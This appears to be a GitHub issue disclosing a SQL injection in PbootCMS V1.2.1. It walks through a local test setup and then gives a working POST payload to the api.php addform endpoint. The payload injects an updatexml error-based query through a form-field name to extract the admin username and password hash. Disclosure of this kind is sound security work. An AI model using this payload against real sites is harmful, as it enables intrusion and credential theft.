You signed in with another tab or window. Reload to refresh your session.You signed out in another tab or window. Reload to refresh your session.You switched accounts on another tab or window. Reload to refresh your session.Dismiss alert
The default database is sqlite. For testing convenience, we need to replace the default database with the mysql database.
the mysql database directory:
Pbootcms-master\static\backup\sql\20180720164810_pbootcms.sql
Authorization code required after installation,We can go to this URL and enter our ip to get the authorization code.
URL:https://www.pbootcms.com/freeasn.html
This SQL injection requires background api functionality.
The default database is sqlite. For testing convenience, we need to replace the default database with the mysql database.
the mysql database directory:
Pbootcms-master\static\backup\sql\20180720164810_pbootcms.sql
Authorization code required after installation,We can go to this URL and enter our ip to get the authorization code.
URL:https://www.pbootcms.com/freeasn.html
This SQL injection requires background api functionality.
http://127.0.0.1/Pbootcms-master/admin.php
username=admin
password=123456
When the api function is enabled in the background, the foreground api will have SQL injection.
http://127.0.0.1/PbootCMS-V1.2.1/api.php/cms/addform?fcode=1
POST:contacts[content`) VALUES ( updatexml(1,concat(0x7e,(SELECT//distinct//concat(0x23,username,0x3a,password,0x23)//FROM//ay_user//limit//0,1),0x7e),1) );-- a] = 111 & mobile=13112344321 & content=123
We can get the admin account name and password
The text was updated successfully, but these errors were encountered: